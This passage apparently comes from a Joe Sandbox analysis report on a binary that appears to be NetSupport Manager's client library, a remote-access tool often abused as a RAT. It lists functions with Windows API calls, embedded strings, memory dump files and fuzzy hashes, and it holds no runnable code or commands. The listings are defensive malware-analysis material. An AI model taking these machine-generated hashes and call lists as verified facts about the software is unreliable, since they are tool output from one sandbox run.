                                                                                            • Part of subcall function 005B3F70: ShellExecuteW.SHELL32(?,open,?,00000000,0061A054,00000001), ref: 005B3FC6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CursorWindow$ExecuteLoadShell
                                                                                          • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                                          • API String ID: 3131440150-763374134
                                                                                          • Opcode ID: 76ec17db3701b9e46b3b8b99107f22282258105d487069d21c40a72bbbd71660
                                                                                          • Instruction ID: 1138338ddf7b770fb3a291aa8deb56943de99cb7cfbe887d585fb960dbb4c358
                                                                                          • Opcode Fuzzy Hash: 76ec17db3701b9e46b3b8b99107f22282258105d487069d21c40a72bbbd71660
                                                                                          • Instruction Fuzzy Hash: 9E112973E8121537CB203A506C0BEDB3F4DBFA5766F084021FD08A6142E766B9448AF6
                                                                                          Function 005E1067 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 005E10DA
                                                                                          • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 005E1108
                                                                                          • MoveFileExW.KERNEL32(?,?,00000004), ref: 005E1127
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Move$Copy
                                                                                          • String ID: .new$Copy %s to %s$pcigina
                                                                                          • API String ID: 2731655860-4090019360
                                                                                          • Opcode ID: 36531302fd93b725dddb7d7d5493f65d0311541af26d828c90a274b119168f65
                                                                                          • Instruction ID: 58b25656bb09c989b7402ac8642daf89af96e168ce7b50f23084684f5aafd10a
                                                                                          • Opcode Fuzzy Hash: 36531302fd93b725dddb7d7d5493f65d0311541af26d828c90a274b119168f65
                                                                                          • Instruction Fuzzy Hash: EA2126B6E4021886CB349F55CD56BEA73B9FF94310F000099FB4A931C1EA714E80CBA1
                                                                                          Function 005D2200 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 65COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • BeginPaint.USER32(?,?), ref: 005D225C
                                                                                          • EndPaint.USER32(?,?), ref: 005D2267
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • GlobalFree.KERNEL32(?), ref: 005D228E
                                                                                          • DefWindowProcW.USER32(?,?,?,?,000000FF), ref: 005D229B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Paintwsprintf$BeginFreeGlobalLocalProcTimeWindowwvsprintf
                                                                                          • String ID: Create main window$Destroy Window
                                                                                          • API String ID: 82888663-300420290
                                                                                          • Opcode ID: e3915db943ebdd3d9a4e10bdfe6c50d41cb8b00055fba7d5d69aad26b0101d94
                                                                                          • Instruction ID: d692d29d303bee07c46d289014cbc81a512cccff69896e2d26c45957bae65ac6
                                                                                          • Opcode Fuzzy Hash: e3915db943ebdd3d9a4e10bdfe6c50d41cb8b00055fba7d5d69aad26b0101d94
                                                                                          • Instruction Fuzzy Hash: A51193799442099BCB24EF9C9C899FE7BA9FB66714F044027F44693341D6305D02CBA2
                                                                                          Function 005CD0B0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005C92B0: GetVersionExW.KERNEL32(0063BEF0,00000000), ref: 005C92E0
                                                                                            • Part of subcall function 005C92B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 005C931F
                                                                                          • LoadLibraryW.KERNEL32(shcore.dll), ref: 005CD0CF
                                                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 005CD0F3
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005CD103
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadOpenProcVersion
                                                                                          • String ID: SetProcessDPIAwareness(%d)$SetProcessDpiAwareness$shcore.dll
                                                                                          • API String ID: 1428820756-152109829
                                                                                          • Opcode ID: 8406b8add6fdf886b0b3f5156988e60ed565964f8fda9f52cafcde7502e216f4
                                                                                          • Instruction ID: 15687018c339bd15ee7e5c503625dadfb0fbb00ecf76f12e7c65b64a42061459
                                                                                          • Opcode Fuzzy Hash: 8406b8add6fdf886b0b3f5156988e60ed565964f8fda9f52cafcde7502e216f4
                                                                                          • Instruction Fuzzy Hash: C2F0BB327462112FE3101AE97C9AF9ABB5DEB81B79F0D023AF91DE11C1D6819900C1B6
                                                                                          Function 005941F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 46registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 005941FD
                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00594237
                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0059424B
                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00594256
                                                                                          Strings
                                                                                          • (idata->flags & CFG_VOLATILE) == 0, xrefs: 00594212
                                                                                          • ..\CTL32\Config.cpp, xrefs: 0059420D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Leave$DeleteEnter
                                                                                          • String ID: (idata->flags & CFG_VOLATILE) == 0$..\CTL32\Config.cpp
                                                                                          • API String ID: 122283594-2091732786
                                                                                          • Opcode ID: 791cf70099989db7719fb9bae644ce116e221b35b147f21a634baa9e6a6bb236
                                                                                          • Instruction ID: 579ecc5d808acee1fc5379d3cf7a56fbf6c8ebb1bb954c2aeecb8c1afc7393d8
                                                                                          • Opcode Fuzzy Hash: 791cf70099989db7719fb9bae644ce116e221b35b147f21a634baa9e6a6bb236
                                                                                          • Instruction Fuzzy Hash: 6AF0F477504208AFDB109B64FC99DEAB7ADFB98755F08812AF905C2082D372A802CB70
                                                                                          Function 0061023C Relevance: 9.2, APIs: 6, Instructions: 244COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,00000000), ref: 006102FA
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000), ref: 00610380
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000), ref: 006103F3
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,006104DA,00000000,00000000,00000000), ref: 0061040C
                                                                                            • Part of subcall function 005E7CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,752F55F0,?,005B97EE,00000000,?,?), ref: 005E7CE9
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,006104DA,00000000,00000000,00000000), ref: 00610468
                                                                                          • CompareStringW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0061047C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$AllocateCompareHeapInfoString
                                                                                          • String ID:
                                                                                          • API String ID: 1019172818-0
                                                                                          • Opcode ID: 21ceefccafdca81bbce81a3eedde5315e399f454234dd113fccbecd0d8b15a44
                                                                                          • Instruction ID: 296d9b2117ad684866d6317d2326a93a4df9f2ef89a3c4d4e93586c1311df46a
                                                                                          • Opcode Fuzzy Hash: 21ceefccafdca81bbce81a3eedde5315e399f454234dd113fccbecd0d8b15a44
                                                                                          • Instruction Fuzzy Hash: FA81B43190024A9FFF218EA98C89BEE7BA3AF45310F2C4156E961A62D1C7F4CDC1C760
                                                                                          Function 005BC0F0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InitializeCriticalSection.KERNEL32(0063B71C,DE64E134), ref: 005BC129
                                                                                            • Part of subcall function 005E91A1: RaiseException.KERNEL32(?,x)c,00000000,?,~6^,00632978,?,005E2ECB,00000000,?,005E367E,?), ref: 005E91E3
                                                                                          • InitializeCriticalSection.KERNEL32(00000000), ref: 005BC1B1
                                                                                          • EnterCriticalSection.KERNEL32(0063B71C), ref: 005BC1CD
                                                                                          • LeaveCriticalSection.KERNEL32(0063B71C,?,00000001), ref: 005BC223
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Initialize$EnterExceptionLeaveRaise
                                                                                          • String ID: ..\CTL32\Refcount.cpp$p < ep
                                                                                          • API String ID: 3261150159-1059512116
                                                                                          • Opcode ID: ff534aa7bbbdee778bedfbc94379d651b036a2a8e2db1f0aa18afd6665882d06
                                                                                          • Instruction ID: 31ba95559c42504c63a6d37a5c4368383fcce4187a0fb7e004d950b0743c9f94
                                                                                          • Opcode Fuzzy Hash: ff534aa7bbbdee778bedfbc94379d651b036a2a8e2db1f0aa18afd6665882d06
                                                                                          • Instruction Fuzzy Hash: 3731C275D003049FCB10DF58D849ADABFF5FB88710F15422AE955A7381D7B1A940CBA1
                                                                                          Function 005DE8CC Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0059AD70: GetLastError.KERNEL32 ref: 0059ADB9
                                                                                          • GetLastError.KERNEL32 ref: 005DE91B
                                                                                          • GetLastError.KERNEL32 ref: 005DE99D
                                                                                          Strings
                                                                                          • restart audio ret %d, xrefs: 005DE95E
                                                                                          • Install audio driver ret x%x, e=%d, xrefs: 005DE9A5
                                                                                          • Remove audio driver ret %d, e=%d, xrefs: 005DE923
                                                                                          • Attempting to restart audio, xrefs: 005DE944
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast
                                                                                          • String ID: Attempting to restart audio$Install audio driver ret x%x, e=%d$Remove audio driver ret %d, e=%d$restart audio ret %d
                                                                                          • API String ID: 1452528299-2276465569
                                                                                          • Opcode ID: 89cb18cb18458013b1159977cd57e020c8b02d662d0830f38c1c01b7b49cb573
                                                                                          • Instruction ID: e173553fa36a069b97daf630185c5e486120f26c4e38b541d358a4b79ed5ad4f
                                                                                          • Opcode Fuzzy Hash: 89cb18cb18458013b1159977cd57e020c8b02d662d0830f38c1c01b7b49cb573
                                                                                          • Instruction Fuzzy Hash: 7821AD729024155ACF34FB6C9CAB7BD7B95BB94340F044477F90756382DA311D94CAE2
                                                                                          Function 005B6E40 Relevance: 9.1, APIs: 6, Instructions: 58windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 005B6E59
                                                                                          • SelectPalette.GDI32(00000000,?,00000000), ref: 005B6E77
                                                                                          • RealizePalette.GDI32(00000000), ref: 005B6E80
                                                                                          • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 005B6E91
                                                                                          • SelectPalette.GDI32(00000000,00000000,00000000), ref: 005B6EA1
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005B6EAA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Palette$Select$BitmapCreateRealizeRelease
                                                                                          • String ID:
                                                                                          • API String ID: 1213237138-0
                                                                                          • Opcode ID: b3d0fa38c0a2deb69579ca8f7e756a006c6b4d28b926a826b36bd202aaba89df
                                                                                          • Instruction ID: bf89735e9c634f3f74e09f33a447d79317e21c8349d96fa9018cfd51bb9b187f
                                                                                          • Opcode Fuzzy Hash: b3d0fa38c0a2deb69579ca8f7e756a006c6b4d28b926a826b36bd202aaba89df
                                                                                          • Instruction Fuzzy Hash: 3F01D4766011147BD7219B7AEC4EFEBBBADEB86761F044062FE08D2240DA309D0186B1
                                                                                          Function 005D3070 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 185COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSystemDirectoryW.KERNEL32(?,000000F2), ref: 005D30A4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DirectorySystem
                                                                                          • String ID: .dll$.org
                                                                                          • API String ID: 2188284642-843266101
                                                                                          • Opcode ID: 98313bbabdd1a79fe582a4f28de88987b2db1ac5e7bcf8f934a993f4839ced38
                                                                                          • Instruction ID: 51097547c8cf64645d3a026f8c2898549891df50c012f3a70ff6ea75d0a9a809
                                                                                          • Opcode Fuzzy Hash: 98313bbabdd1a79fe582a4f28de88987b2db1ac5e7bcf8f934a993f4839ced38
                                                                                          • Instruction Fuzzy Hash: F861FC75A0021A8BCB309FACCD267A677B5FF84350F0585A6EE469B350F370AE41CB91
                                                                                          Function 005DA690 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 124COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 005DA75E
                                                                                            • Part of subcall function 005DF5E0: LoadStringW.USER32(00590000,000003F9,?,00000100), ref: 005DF60A
                                                                                            • Part of subcall function 005DF5E0: wvsprintfW.USER32(?,?,00000000), ref: 005DF622
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharLoadMultiStringWidewvsprintf
                                                                                          • String ID: %s$0x%lx$Written nsm.lic, cks=%x, wrap=%d, product=%d, expiry=%d/%d/%d, start=%d/%d/%d$r+t
                                                                                          • API String ID: 3313190917-3235974708
                                                                                          • Opcode ID: 8cb633b6c09f6ec2885623fad8eaac0d139565aab2a5e587d4b1caf7fcc8fa13
                                                                                          • Instruction ID: 25adfe4c1f21a7119ad0ab98f042092060653498eb84e8314daae66542e1089e
                                                                                          • Opcode Fuzzy Hash: 8cb633b6c09f6ec2885623fad8eaac0d139565aab2a5e587d4b1caf7fcc8fa13
                                                                                          • Instruction Fuzzy Hash: 7B3138769001207BD7319B95AC46F7B3BAAFB86B10F14412BFE4457281FA746C45C7E2
                                                                                          Function 005B6920 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(?,?,00000104), ref: 005B69F8
                                                                                          • GetModuleFileNameW.KERNEL32(00000000), ref: 005B69FF
                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 005B6A32
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileModuleName$HandleSave
                                                                                          • String ID: Pa$X
                                                                                          • API String ID: 3331948136-4184412011
                                                                                          • Opcode ID: c3decf9e232b867c08daeedfd4c61f4220c77dcbf933a73f7861b292a12cda9f
                                                                                          • Instruction ID: 03af0f04578f3a6cdca7678be66b065ee3e8ab284d6484f7a97d3c5293c51160
                                                                                          • Opcode Fuzzy Hash: c3decf9e232b867c08daeedfd4c61f4220c77dcbf933a73f7861b292a12cda9f
                                                                                          • Instruction Fuzzy Hash: 4341B1B19002199BDF209F248C56BEB7BBAFFC4710F048199E909A7281EB759E54CF61
                                                                                          Function 005BC640 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005BC560: GetComputerNameW.KERNEL32(?,?), ref: 005BC60E
                                                                                          • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 005BC712
                                                                                          • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 005BC74E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Delete$ComputerName
                                                                                          • String ID: IsA()$\Registry\Machine\$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h
                                                                                          • API String ID: 2275906161-1104758002
                                                                                          • Opcode ID: 98ab60e0469722d270531e81fc9b0324527a23fd6e853c40b639801a9319e1ea
                                                                                          • Instruction ID: c1ac7aa8dee0a12c2aa24bfffce97c3db28c3cdd9e5b795220afd21abdc756d9
                                                                                          • Opcode Fuzzy Hash: 98ab60e0469722d270531e81fc9b0324527a23fd6e853c40b639801a9319e1ea
                                                                                          • Instruction Fuzzy Hash: 4F31A571D0020AAFDB00DB98DC56EEEBB79FF98704F044159F911B32C1DA71AA05CBA1
                                                                                          Function 005AC3F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91windowthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(?,0000004A,?,?), ref: 005AC469
                                                                                          • SendMessageW.USER32(00000000,0000004A,?,?), ref: 005AC4A2
                                                                                            • Part of subcall function 005AC2C0: IsWindow.USER32(?), ref: 005AC2E5
                                                                                            • Part of subcall function 005AC2C0: GetClassNameW.USER32(?,?,00000040), ref: 005AC2F9
